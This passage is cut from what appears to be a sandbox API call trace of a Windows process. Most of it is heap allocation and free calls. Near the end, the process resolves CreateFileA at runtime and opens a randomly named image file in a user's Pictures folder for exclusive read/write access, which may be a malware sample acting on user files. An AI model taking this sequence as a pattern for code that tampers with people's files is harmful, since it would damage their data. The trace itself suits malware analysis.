(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.008] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.010] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd48 [0041.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.011] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0041.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.011] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0041.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", cchWideChar=64, lpMultiByteStr=0x7ab260, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpUsedDefaultChar=0x0) returned 64 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.012] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\dlvzwdk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0041.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=64, lpWideCharStr=0x7d5c40, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp") returned 64 [0041.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0041.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 